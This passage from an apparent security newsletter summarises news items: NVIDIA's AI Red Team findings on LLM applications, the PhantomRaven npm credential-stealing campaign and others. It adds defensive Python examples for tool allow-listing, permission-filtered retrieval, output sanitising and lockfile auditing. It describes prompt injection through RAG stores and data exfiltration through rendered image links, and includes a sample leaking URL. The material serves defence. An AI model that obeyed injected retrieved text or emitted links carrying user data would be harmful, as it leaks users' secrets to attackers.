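                "entropy": round(entropy, 2), "value": _mask(value),
            })
    findings.sort(key=lambda f: (f["line"], f["kind"]))
    return findings


if __name__ == "__main__":
    for f in scan_bundle(SAMPLE_BUNDLE):
        print(f"line {f['line']}: {f['kind']} ({f['confidence']}) {f['value']}")
```

The "conservative verification" the article describes corresponds here to the confidence field: a fixed-format match can be checked against the issuing service, while an entropy hit on a generic keyword is only a lead until someone confirms the value is live.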

AI as the New Compiler for Software

In his blog, Tony Zhang argues that large language models (LLMs) paired with formal-methods tools can transform code generation into a provably correct process. He suggests the role of AI is shifting from “assistant” to a compiler-like engine—taking developer intent and rigorously translating it into verified software. This could finally bring formal verification into mainstream software engineering by embedding correctness checks directly into the development pipeline.  https://tonyzhangnd.github.io/2025/10/AI-is-a-compiler.html

Cybersecurity Tool Sprawl Is Escalating – and Getting Worse (2024)

Old article, still relevant. Organizations now manage an average of 70 to 130 cybersecurity tools, with many planning to add even more despite widespread underuse. Only 10 to 20 percent of these tools are fully utilized, leading to redundancy, poor integration, and operational inefficiency. Experts warn that unchecked expansion and fragmented security stacks are turning investments into liabilities, as companies struggle to manage overlapping capabilities and inconsistent visibility across their environments. https://siliconangle.com/2024/08/05/cybersecurity-tool-sprawl-control-going-get-worse

Island Browser: Redefining the Corporate Web Workspace

Island is a Chromium-based enterprise browser built to embed security and governance directly into the browsing environment. It allows organizations to control user actions such as copy, download, and screenshot, enforce conditional access based on identity or device posture, and secure SaaS and internal web apps across managed or unmanaged devices. Positioned as a leader in the enterprise browser market, Island aims to make the browser itself the central control point for security and productivity in hybrid work environments.  https://www.island.io/

Funding Crisis Threatens Global Vulnerability Tracking

The CVE program faced near collapse after funding for the National Vulnerability Database was depleted, disrupting access to essential vulnerability data. In response, several organizations proposed alternatives, including the CVE Foundation, ENISA’s EUVD, and a Global Vulnerability Catalog. CISA outlined a plan to reform vulnerability tracking but faces its own budget and staffing constraints, casting doubt on its ability to lead. The conflict’s outcome will determine the future of global vulnerability coordination. https://cyberscoop.com/cve-program-funding-crisis-nvd-cisa-alternatives

Hardening LLM-based Applications: Insights from NVIDIA’s AI Red Team

The blog by the NVIDIA AI Red Team outlines three major security risks in large-language-model applications: executing model-generated code without sandboxing (leading to remote code execution), insecure permissions in retrieval-augmented-generation (RAG) stores enabling data leaks or prompt injection, and active content rendering (images/links) in LLM outputs causing inadvertent exfiltration. They recommend replacing exec/eval with safe mappings, enforcing per-user permissions on RAG data, and sanitising or disabling dynamic link/image content.  https://developer.nvidia.com/blog/practical-llm-security-advice-from-the-nvidia-ai-red-team
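The three recommendations above, in one added Python example that is not code from NVIDIA or from the post: a tool allow-list that dispatches a model-emitted JSON call instead of passing model text to `eval`, a retrieval function that applies the caller's group membership before ranking so unauthorised chunks never reach the prompt, and an output sanitiser that removes Markdown images and strips URLs from links whose host is not allow-listed. The tool names, the RAG store, its ACLs and the allowed link host are all constructed for the example.

```python
"""Allow-listed tool dispatch, ACL-first retrieval, and active-content sanitising."""
import json
import re
from urllib.parse import urlparse

# 1. Dispatch through a mapping. The pattern the post warns against would be
#    `result = eval(model_output)`; here the model can only name a key of TOOLS.
TOOLS = {
    "count_words": lambda a: len(str(a.get("text", "")).split()),
    "shout": lambda a: str(a.get("text", "")).upper(),
}


def run_tool_call(model_output: str) -> dict:
    """Expect {"tool": <name>, "arguments": {...}} from the model; refuse anything else."""
    try:
        call = json.loads(model_output)
    except json.JSONDecodeError:
        return {"ok": False, "error": "output is not a JSON tool call"}
    if not isinstance(call, dict):
        return {"ok": False, "error": "tool call must be a JSON object"}
    name = call.get("tool")
    args = call.get("arguments", {})
    if name not in TOOLS:
        return {"ok": False, "error": f"tool {name!r} is not allow-listed"}
    if not isinstance(args, dict):
        return {"ok": False, "error": "arguments must be a JSON object"}
    return {"ok": True, "result": TOOLS[name](args)}


# 2. Constructed RAG store: every chunk carries the groups allowed to read it.
RAG_STORE = [
    {"id": "hr-1", "text": "salary bands for 2025 are confidential", "allowed_groups": {"hr"}},
    {"id": "eng-1", "text": "deploy runbook: rotate signing keys quarterly", "allowed_groups": {"engineering"}},
    {"id": "pub-1", "text": "office hours are 9 to 5", "allowed_groups": {"everyone"}},
]


def retrieve(query_terms, user_groups, top_k=3):
    """Filter by ACL before ranking; a chunk the user may not read is never a candidate."""
    effective = set(user_groups) | {"everyone"}
    candidates = [c for c in RAG_STORE if c["allowed_groups"] & effective]
    terms = [t.lower() for t in query_terms]
    scored = [(sum(t in c["text"] for t in terms), c) for c in candidates]
    scored = [(s, c) for s, c in scored if s > 0]
    scored.sort(key=lambda sc: -sc[0])
    return [c for _, c in scored[:top_k]]


# 3. Strip active content before the answer is rendered as Markdown.
MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")
MD_LINK = re.compile(r"\[([^\]]*)\]\(([^)\s]+)[^)]*\)")
ALLOWED_LINK_HOSTS = {"docs.example.invalid"}  # assumed allow-list for this example


def sanitize_output(text: str) -> str:
    """Images are dropped (rendering one fetches the URL, leaking whatever is in it);
    links keep their label but lose the URL unless the host is allow-listed."""
    text = MD_IMAGE.sub(lambda m: f"[image removed: {m.group(1)}]", text)

    def keep_or_strip(m):
        label, url = m.group(1), m.group(2)
        if (urlparse(url).hostname or "") in ALLOWED_LINK_HOSTS:
            return m.group(0)
        return label

    return MD_LINK.sub(keep_or_strip, text)


if __name__ == "__main__":
    print(run_tool_call('{"tool": "count_words", "arguments": {"text": "a b c"}}'))
    print([c["id"] for c in retrieve(["salary"], ["engineering"])])
    print(sanitize_output("See ![x](http://evil.invalid/?q=SECRET) and [click](http://evil.invalid/e?d=1)"))
```

The ordering in `retrieve` is the point: authorisation is applied to the candidate set, not to the ranked result, so a prompt-injected query cannot pull a forbidden chunk into the context by ranking it highly.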

EY Misconfigures Cloud Storage, Exposes 4 TB SQL Backup

A large 4-terabyte SQL Server backup belonging to Ernst & Young (EY) was found publicly accessible on the internet, likely due to a misconfigured cloud storage bucket. The exposed file contained database schemas, API keys, session and authentication tokens, service-account passwords and other sensitive data. Researchers from Neo Security discovered the leak and reported it; EY confirmed the issue was limited to one acquired entity and stated that no client or personal data were impacted.  https://www.linkedin.com/pulse/ernst-young-ey-exposes-4tb-database-online-what-qypre/

Malware Campaign in NPM Registry Steals GitHub Tokens

Researchers uncovered a major supply-chain attack (codenamed “PhantomRaven”) affecting at least 126 packages in the npm registry. The malware uses remote dependencies hosted on attacker-controlled servers to bypass detection and, via pre-install hooks, harvests developer credentials including GitHub tokens and CI/CD secrets. The campaign has been active since August 2025 and has amassed over 86,000 downloads, underscoring the urgent need for auditing dependencies and rotating exposed credentials.  https://www.linkedin.com/pulse/malware-found-126-npm-packages-stealing-github-tokens-reversinglabs-llohe/
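The Datadog recommendations earlier on this page (package age thresholds, continuous dependency auditing, metadata anomalies) and the PhantomRaven tradecraft described here (remote dependencies, pre-install hooks) call for the same check, so here is one added Python example that covers both; it is not code from Datadog, ReversingLabs or npm. It reads a `package-lock.json` (lockfileVersion 3 layout, whose `resolved` URL and `hasInstallScript` flag are real fields) and the `time` map from npm registry documents, and flags versions younger than a threshold, packages resolved from anywhere other than the trusted registry, packages that run install scripts, and versions the registry has no publish time for. The lockfile, the registry subset, the 7-day threshold and the fixed audit date are constructed assumptions; in real use the registry data comes from `https://registry.npmjs.org/<name>`.

```python
"""Audit a package-lock.json for young, remotely sourced or script-running packages."""
import json
from datetime import datetime, timedelta, timezone
from urllib.parse import urlparse

TRUSTED_REGISTRY_HOSTS = {"registry.npmjs.org"}
MIN_AGE_DAYS = 7  # assumed policy: refuse versions published less than a week ago

# Constructed package-lock.json (lockfileVersion 3); not a real project's lockfile.
SAMPLE_LOCK = json.dumps({
    "name": "example-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "example-app", "version": "1.0.0"},
        "node_modules/left-pad-ish": {
            "version": "2.3.1",
            "resolved": "https://registry.npmjs.org/left-pad-ish/-/left-pad-ish-2.3.1.tgz",
        },
        "node_modules/shiny-new-lib": {
            "version": "0.0.2",
            "resolved": "https://registry.npmjs.org/shiny-new-lib/-/shiny-new-lib-0.0.2.tgz",
            "hasInstallScript": True,
        },
        "node_modules/remote-helper": {
            "version": "1.0.0",
            "resolved": "http://packages.example.invalid/remote-helper-1.0.0.tgz",
        },
    },
})

# Constructed subset of registry documents: only the per-version "time" map is kept.
SAMPLE_REGISTRY = {
    "left-pad-ish": {"time": {"2.3.1": "2024-03-10T12:00:00.000Z"}},
    "shiny-new-lib": {"time": {"0.0.2": "2025-10-29T08:15:00.000Z"}},
}
AUDIT_NOW = datetime(2025, 11, 1, tzinfo=timezone.utc)  # fixed so the sample is deterministic


def _package_name(lock_path: str) -> str:
    """'node_modules/a/node_modules/@s/b' -> '@s/b' (last node_modules segment)."""
    return lock_path.split("node_modules/")[-1]


def _parse_npm_time(ts: str) -> datetime:
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%fZ").replace(tzinfo=timezone.utc)


def audit_lock(lock_json: str, registry: dict, now: datetime, min_age_days=MIN_AGE_DAYS):
    """Return findings sorted by package and issue code."""
    lock = json.loads(lock_json)
    findings = []

    def flag(name, version, issue, detail):
        findings.append({"package": name, "version": version, "issue": issue, "detail": detail})

    for path, entry in lock.get("packages", {}).items():
        if path == "" or entry.get("link"):  # root project or workspace symlink
            continue
        name, version = _package_name(path), entry.get("version", "")
        resolved = entry.get("resolved", "")
        if (urlparse(resolved).hostname or "") not in TRUSTED_REGISTRY_HOSTS:
            flag(name, version, "UNTRUSTED_SOURCE", f"resolved from {resolved or '<none>'}")
        if entry.get("hasInstallScript"):
            flag(name, version, "INSTALL_SCRIPT", "runs a lifecycle (pre/post)install script")
        published = registry.get(name, {}).get("time", {}).get(version)
        if published is None:
            flag(name, version, "UNKNOWN_AGE", "registry has no publish time for this version")
        else:
            age = now - _parse_npm_time(published)
            if age < timedelta(days=min_age_days):
                flag(name, version, "TOO_NEW",
                     f"published {age.days} day(s) ago, threshold {min_age_days}")
    return sorted(findings, key=lambda f: (f["package"], f["issue"]))


def run_sample_audit():
    return audit_lock(SAMPLE_LOCK, SAMPLE_REGISTRY, AUDIT_NOW)


if __name__ == "__main__":
    for f in run_sample_audit():
        print(f"{f['issue']:<17} {f['package']}@{f['version']}: {f['detail']}")
```

Wired into CI before `npm ci`, a non-empty finding list is a reason to fail the build; the age threshold alone would have held back a freshly published malicious version for the window in which registries and scanners usually catch it, and the untrusted-source check is what a remote dependency of the PhantomRaven kind trips.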